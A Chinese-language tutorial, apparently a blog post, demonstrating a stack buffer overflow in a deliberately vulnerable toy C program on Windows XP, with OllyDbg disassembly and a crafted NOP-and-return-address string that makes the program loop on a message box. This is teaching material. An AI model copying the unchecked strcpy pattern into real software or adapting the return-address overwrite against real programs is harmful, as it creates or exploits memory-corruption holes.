溢出实验

前言：最近linuxcici可以说是对溢出已经入了迷了。所以我在这儿做个小型的溢出实验。如有不足，请大家指正。

实验环境：Microsoft Visual C++ 6.0，Windows XP SP2，补丁至最新。OllyDbg1.10。

实验目标：构造存在溢出漏洞的代码，并构造特殊代码以利用这个漏洞。

漏洞代码：
为方便调试，我们用的是VC6.0的Win32 Console Application工程，切换到Release模式(Build->Set Active Configuration)，关闭最优化编译选项(Project->Setting->C/C++，Category选General，Optimizations选Disable)。这样处理以后，用户代码在编译以后会生在0x00401000处。
#include "windows.h"
void over();//一个易溢出模块
//下面一串字符串模拟一串远方传输过来的一个数字流
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x00};//一共4个字符，并不会对over()造成溢出。
int main(int)
{
       MessageBox(NULL, "A normal call", "Try", MB_OK);
       over();
       return 0;
}

void over()
{
       char szBuffer[4];
       strcpy(szBuffer, (char *)szOver);
}
编译，用OllyDbg跟踪(由于各位读者的编译环境不一定和我一样，所以跟踪结果可能不同，请自行处理)。跳到00401000处。
//我们的int main(int)
00401000   /$  55                push ebp
00401001   |.  8BEC              mov ebp,esp
00401003   |.  6A 00             push 0                            ; /Style = MB_OK|MB_APPLMODAL
00401005   |.  68 3C604000       push TestOver.0040603C            ; |Title = "Try"
0040100A   |.  68 40604000       push TestOver.00406040            ; |Text = "A normal call"
0040100F   |.  6A 00             push 0                            ; |hOwner = NULL
00401011   |.  FF15 9C504000     call dword ptr ds:[<&USER32.Messa>; \MessageBoxA
00401017   |.  E8 04000000       call TestOver.00401020
0040101C   |.  33C0              xor eax,eax
0040101E   |.  5D                pop ebp
0040101F   \.  C3                retn
//我们的over()
00401020   /$  55                push ebp
00401021   |.  8BEC              mov ebp,esp
00401023   |.  51                push ecx;晕死，为了申请四个字节的栈空间，随便往栈里压了个数据。怪不得总是说要初始化
00401024   |.  68 30604000       push TestOver.00406030;构造的***串地址，参数入栈
00401029   |.  8D45 FC           lea eax,dword ptr ss:[ebp-4];得到刚才申请的空间的地址
0040102C   |.  50                push eax;参数入栈
0040102D   |.  E8 0E000000       call TestOver.00401040
00401032   |.  83C4 08           add esp,8;刚才两个参数出栈
00401035   |.  8BE5              mov esp,ebp
00401037   |.  5D                pop ebp
00401038   \.  C3                retn
溢出***是更改retn时所用的栈使之跳转异常。这次***我打算让它跳转到代码MessageBox(NULL, "A normal call", "Try", MB_OK)处，在可执行文件里，它在00401003处开始参数入栈。在over()函数里申请了char szBuffer[4]以后，栈里结构如下：
Stack+0->szBuffer[4];
Stack+1->pushed ebp;
Stack+2->Retn add.
所以我们的***串只要比正常串长多8个字节，而最后4个字节是地址00401003就可以让它在执行时跳到00401003处，不断循环弹出对话框。用一贯的规则，是用0x90(对应ASM指令nop，空操作)填充不用的空间。
构造***串如下：
unsigned char szOver[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x03, 0x10, 0x40, 0x00};
完整代码如下：
#include "windows.h"

void over();

unsigned char szOver[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x03, 0x10, 0x40, 0x00};

int main(int)
{
       MessageBox(NULL, "A normal call", "Try", MB_OK);
       over();
       return 0;
}

void over()
{
       char szBuffer[4];
       strcpy(szBuffer, (char *)szOver);
}

编译运行，就可以看到这个程序在不停地弹出消息框。
PS：大型的溢出，会把一份完整的代码写入栈中，再通过非法跳转，运行这份代码。这才是溢出的真谛。